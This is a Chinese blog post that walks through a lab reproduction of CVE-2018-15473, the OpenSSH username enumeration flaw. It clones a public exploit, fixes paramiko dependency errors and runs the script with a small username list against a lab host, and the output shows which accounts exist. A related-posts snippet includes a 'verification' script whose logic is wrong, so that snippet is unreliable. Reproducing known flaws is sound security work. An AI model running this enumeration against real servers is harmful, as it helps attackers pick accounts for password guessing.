CVE-2018-15473 漏洞复现(ssh用户名枚举)

最新推荐文章于 2024-05-24 14:42:09 发布
最新推荐文章于 2024-05-24 14:42:09 发布
阅读量2.4k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: ssh 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43663238/article/details/125771459
版权

CVE-2018-15473 漏洞复现(ssh用户名枚举)

OpenSSH 7.7及之前版本中存在安全漏洞
详细描述:OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。
OpenSSH7.7及之前版本中存在安全漏洞,该漏洞源于程序会对有效的和无效的身份验证请求发出不同的响应。攻击者可通过发送特制的请求利用该漏洞枚举用户名称。

nameIP版本
kali192.168.233.100kali-5.16.0-kali7-amd64
zabbix-server192.168.233.10centos-3.10.0-862.el7.x86_64

kali

git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git
cd CVE-2018-15473-Exploit
pip3 install -r requirements.txt
#-----------------------------------------------------------------
# 报错内容
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. 
It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv  
# 大意是希望我们在虚拟的环境下安装 
#-----------------------------------------------------------------
sudo apt-get update
sudo apt-get upgrade
sudo apt install python3.10-venv
cd CVE-2018-15473-Exploit
python3 -m venv tutorial-env
source tutorial-env/bin/activate


pip3 install -r requirements.txt
# 请反复尝试直至运行命令出现以下回显
#-----------------------------------------------------------------
Requirement already satisfied: paramiko in ./tutorial-env/lib/python3.10/site-packages (from -r requirements.txt (line 1)) (2.4.1)
Requirement already satisfied: pynacl>=1.0.1 in ./tutorial-env/lib/python3.10/site-packages (from paramiko->-r requirements.txt (line 1)) (1.5.0)
Requirement already satisfied: bcrypt>=3.1.3 in ./tutorial-env/lib/python3.10/site-packages (from paramiko->-r requirements.txt (line 1)) (3.2.2)
Requirement already satisfied: cryptography>=1.5 in ./tutorial-env/lib/python3.10/site-packages (from paramiko->-r requirements.txt (line 1)) (37.0.4)
Requirement already satisfied: pyasn1>=0.1.7 in ./tutorial-env/lib/python3.10/site-packages (from paramiko->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: cffi>=1.1 in ./tutorial-env/lib/python3.10/site-packages (from bcrypt>=3.1.3->paramiko->-r requirements.txt (line 1)) (1.15.1)
Requirement already satisfied: pycparser in ./tutorial-env/lib/python3.10/site-packages (from cffi>=1.1->bcrypt>=3.1.3->paramiko->-r requirements.txt (line 1)) (2.21)
#-----------------------------------------------------------------


python3 sshUsernameEnumExploit.py 
#-----------------------------------------------------------------
# 报错内容
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/transport.py:169: CryptographyDeprecationWarning: Blowfish has been deprecated
  'class': algorithms.Blowfish,
Traceback (most recent call last):
  File "/root/CVE-2018-15473-Exploit/sshUsernameEnumExploit.py", line 24, in <module>
    import paramiko
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/__init__.py", line 23, in <module>
    from paramiko.client import (
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/client.py", line 37, in <module>
    from paramiko.hostkeys import HostKeys
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/hostkeys.py", line 23, in <module>
    from collections import MutableMapping
ImportError: cannot import name 'MutableMapping' from 'collections' (/usr/lib/python3.10/collections/__init__.py)
#-----------------------------------------------------------------

pip3 install paramiko==2.4.1      
# 请反复尝试直至运行命令出现以下回显
#-----------------------------------------------------------------
Requirement already satisfied: paramiko==2.4.1 in ./tutorial-env/lib/python3.10/site-packages (2.4.1)
Requirement already satisfied: pyasn1>=0.1.7 in ./tutorial-env/lib/python3.10/site-packages (from paramiko==2.4.1) (0.4.8)
Requirement already satisfied: bcrypt>=3.1.3 in ./tutorial-env/lib/python3.10/site-packages (from paramiko==2.4.1) (3.2.2)
Requirement already satisfied: pynacl>=1.0.1 in ./tutorial-env/lib/python3.10/site-packages (from paramiko==2.4.1) (1.5.0)
Requirement already satisfied: cryptography>=1.5 in ./tutorial-env/lib/python3.10/site-packages (from paramiko==2.4.1) (37.0.4)
Requirement already satisfied: cffi>=1.1 in ./tutorial-env/lib/python3.10/site-packages (from bcrypt>=3.1.3->paramiko==2.4.1) (1.15.1)
Requirement already satisfied: pycparser in ./tutorial-env/lib/python3.10/site-packages (from cffi>=1.1->bcrypt>=3.1.3->paramiko==2.4.1) (2.21)
#-----------------------------------------------------------------

python3 sshUsernameEnumExploit.py 
#-----------------------------------------------------------------
#报错内容 
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/transport.py:169: CryptographyDeprecationWarning: Blowfish has been deprecated
  'class': algorithms.Blowfish,
Traceback (most recent call last):
  File "/root/CVE-2018-15473-Exploit/sshUsernameEnumExploit.py", line 24, in <module>
    import paramiko
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/__init__.py", line 23, in <module>
    from paramiko.client import (
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/client.py", line 37, in <module>
    from paramiko.hostkeys import HostKeys
  File "/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/hostkeys.py", line 23, in <module>
    from collections import MutableMapping
ImportError: cannot import name 'MutableMapping' from 'collections' (/usr/lib/python3.10/collections/__init__.py)
#-----------------------------------------------------------------


vi /root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/hostkeys.py
# 23行修改为
from _collections_abc import MutableMapping
#-----------------------------------------------------------------
python3 sshUsernameEnumExploit.py
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/transport.py:169: CryptographyDeprecationWarning: Blowfish has been deprecated
  'class': algorithms.Blowfish,
usage: sshUsernameEnumExploit.py [-h] [--port PORT] [--threads THREADS]
                                 [--outputFile OUTPUTFILE]
                                 [--outputFormat {list,json,csv}]
                                 (--username USERNAME | --userList USERLIST)
                                 hostname
sshUsernameEnumExploit.py: error: the following arguments are required: hostname
#-----------------------------------------------------------------
# 这里要自己找到一个好的字典
cat sshUsername.txt
tom
root
abc
admin
user
zabbix
example
111111
nobody
12345
master
#-----------------------------------------------------------------       
# 执行以下命令就可以进行判断了
python3 sshUsernameEnumExploit.py --port 22 --userList sshUsername.txt  --outputFile test.csv --outputFormat csv 192.168.233.10

/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/transport.py:169: CryptographyDeprecationWarning: Blowfish has been deprecated
  'class': algorithms.Blowfish,
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/kex_ecdh_nist.py:39: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding.
  m.add_string(self.Q_C.public_numbers().encode_point())
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/kex_ecdh_nist.py:91: CryptographyDeprecationWarning: Support for unsafe construction of public numbers from encoded data will be removed in a future version. Please use EllipticCurvePublicKey.from_encoded_point
  self.Q_S = ec.EllipticCurvePublicNumbers.from_encoded_point(
/root/CVE-2018-15473-Exploit/tutorial-env/lib/python3.10/site-packages/paramiko/kex_ecdh_nist.py:103: CryptographyDeprecationWarning: encode_point has been deprecated on EllipticCurvePublicNumbers and will be removed in a future version. Please use EllipticCurvePublicKey.public_bytes to obtain both compressed and uncompressed point encoding.
  hm.add_string(self.Q_C.public_numbers().encode_point())
[+] Results successfully written to test.csv in CSV form.

┌──(tutorial-env)(root㉿kali)-[~/CVE-2018-15473-Exploit]
└─# ls
Dockerfile          exampleOutput.txt          sshUsername.txt
exampleInput.txt    README.md                  test.csv
exampleOutput.csv   requirements.txt           tutorial-env
exampleOutput.json  sshUsernameEnumExploit.py
                                                                             
┌──(tutorial-env)(root㉿kali)-[~/CVE-2018-15473-Exploit]
└─# cat test.csv 
Username, Valid
tom, False
root, True
abc, False
admin, False
user, False
zabbix, True
example, False
111111, False
nobody, True
12345, False
master, False

https://blog.csdn.net/weixin_43663238?type=blog

在这里插入图片描述

链接: 又是一个坑:Reading package lists… Done Building dependency
链接: Linux pip错误分析 (Running pip as the ‘root‘ user can result in broken permissions and conflict)
链接: pip/pip3使用豆瓣源加速安装软件
链接: Python关于ImportError: cannot import name ‘MutableMapping‘ (或者‘Iterable‘ )from ‘collections‘

啊酒弟弟
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OpenSSH 用户名枚举漏洞复现CVE-2018-15473
千寻的博客
03-06 2720
文章目录漏洞名称漏洞编号漏洞描述影响版本环境搭建漏洞复现修复建议学习笔记链接摘抄 漏洞名称 OpenSSH 用户名枚举漏洞 漏洞编号 CVE-2018-15473 漏洞描述 OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用
SSH用户枚举漏洞CVE-2018-15473)原理学习
weixin_30915275的博客
08-24 1342
一、漏洞简介 1、漏洞编号和类型 CVE-2018-15473 SSH 用户名(USERNAME)暴力枚举漏洞 2、漏洞影响范围 OpenSSH 7.7及其以前版本 3、漏洞利用方式 由于SSH本身的认证机制存在缺陷,导致攻击者可以使用字典,暴力枚举SSH存在的用户名(Username) 4、漏洞修复方式 升级openssh 二、漏洞原理及其利用分析 1、漏洞原理 参考国外文献:...
CVE-2018-15473-Exploit-master
12-19
CVE-2018-15473-Exploit-master验证脚本
CentOS的Ssh漏洞修复
最新发布
ahaahaj的博客
05-24 168
centos7的ssh漏洞修复
OpenSSH 用户枚举漏洞(CVE-2018-15473)修复
热门推荐
huryer的专栏
01-04 2万+
OpenSSH 用户枚举漏洞(CVE-2018-15473) 1、漏洞描述 漏洞名称 OpenSSH 用户枚举漏洞(CVE-2018-15473)【原理扫描】 详细描述 : OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻...
OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现
Senimo
08-02 9320
OpenSSH 用户名枚举漏洞 CVE-2018-15473 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 攻击者可以尝试使用格式错误的数据包(例如,截断的数据包)对用户进行身份验证,并且: 如果用户无效(不存在),则 userauth_pubkey()立即返回,服务器发送 SSH2_MSG_USERAUTH_FAILURE到攻击者;
【vulhub】openssh CVE-2018-15473漏洞复现
qq_58873970的博客
09-06 636
ssh工作机制:服务器启动的时候自己产生一个密钥(768bit公钥),本地的ssh客户端发送连接请求到ssh服务器,服务器检查连接点客户端发送的数据和IP地址,确认合法后发送密钥(768bits)给客户端,此时客户端将本地私钥(256bit)和服务器的公钥(768bit)结合成密钥对key(1024bit),发回给服务器端,建立连接通过key-pair数据传输。
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-15473ssh用户名枚举漏洞复现(避坑)
gh0stf1re的博客
09-17 6272
CVE-2018-15473 漏洞复现 前言 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 复现过程 克隆poc脚本到本地 git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git (注意:该脚本使用python3编写) 安装依赖库: pip3 install -r requirements.txt 运行脚本 root@kali:~/Desktop/CVE-2018-
CVE-2018-15473(OpenSSH用户枚举漏洞
1stPeak's Blog
06-07 2614
CVE-2018-15473复现笔记 影响版本 该影响自1999年以来至今年7.7版本中所有版本,远程攻击者可利用漏洞猜测在OpenSSH服务器上注册的用户名 POC链接 https://github.com/1stPeak/CVE-2018-15473 POC环境配置 git clone hhttps://github.com/1stPeak/CVE-2018-15473.git cd CVE-2018-15473 #注意:如果您在kali上安装,则可以跳过pip安装;paramiko已经在那里。 .
CVE-2018-15473漏洞修复-离线版
weixin_45918954的博客
02-20 1401
通过 find / -name libcrypto.so.3 和 libssl.so.3 查找到对应so文件的位置,并建立软连接。(可能下面的ssh.pam文件都没用到,因为sshd_config配置文件貌似没使用它,请自行测试。根据漏扫建议升级OpenSSH-7.8已经修复这个安全问题,我想不如干脆升级到8.8p1版本算了。OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的。根据原ssh配置文件,修改新生成的配置文件/etc/ssh/sshd_config。
OpenSSH 用户名枚举漏洞CVE-2018-15473
锋刃科技的博客
06-21 4305
前言 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 已经通过Github公开 https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 环境搭建 cd vulhub/openssh/CVE-2018-15473 docker-compose build && docker-compose up -d 环境启动后,我
CVE-2018-15473ssh用户名枚举漏洞复现遇到的问题
Xshihao的博客
03-07 464
paramiko库运行脚本出错解决办法
CVE-2018-15473 修复
weixin_28947667的博客
06-26 1386
漏洞和auth2-gss.cauth2-hostbased.cauth2-pubkey.c有关。--也可以拼接起来,不过报错就不知道哪里有问题了 ./configure && make && make install。当openssh版本过低时,会出现OpenSSH 用户枚举漏洞(CVE-2018-15473)--上传压缩包,直接RZ发现没安装,那就安装一下。--发现版本是7.8以下,所以需要升级。--发现安装GCC,那就下载安装GCC。--重启SSH就好了?--方法1,在线升级。--方法2,离线升级。
OpenSSH离线升级,用户枚举漏洞CVE-2018-15473)修复,所有依赖包离线升级
zhangkexin_z的博客
08-12 3179
由于客户服务器OpenSSH检查出高危漏洞(用户枚举漏洞CVE-2018-15473)),所以需要对OpenSSH进行升级,客户的服务器是内网服务器,只能进行离线升级,不能用yum更新 离线包准备 由于依赖包太多,不好在网上全部找出版本对应的依赖,所以推荐用一台测试服务器,用yum缓存包 yum缓存包 修改yum配置文件 vi /etc/yum.conf 修改配置 cachedir=/var/cache/yum/$basearch/$releasever /#缓存包路径 keepcache=1 /#0
cve-2018-15473漏洞验证脚本
07-27
您好!以下是一个用于验证CVE-2018-15473漏洞的简单脚本示例: ```python import paramiko def check_vulnerability(host, port, username, password): try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(host, port=port, username=username, password=password) print("漏洞 CVE-2018-15473 未被修复") client.close() except paramiko.AuthenticationException: print("漏洞 CVE-2018-15473 已被修复") except Exception as e: print("发生异常:", str(e)) # 使用示例 host = "目标主机IP" port = 22 # SSH端口,默认为22 username = "登录用户名" password = "登录密码" check_vulnerability(host, port, username, password) ``` 请确保安装了paramiko库(可以使用`pip install paramiko`进行安装),并将脚本中的目标主机IP、登录用户名和登录密码替换为实际值。 这个脚本尝试使用paramiko库连接到目标主机,如果成功连接,则说明漏洞CVE-2018-15473仍然存在;如果出现`AuthenticationException`异常,则说明漏洞已经被修复。对于其他异常情况,可以根据实际需要进行处理。 请注意,漏洞验证脚本仅供参考,并不能保证完全准确和全面,建议在合法授权和测试范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊酒弟弟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值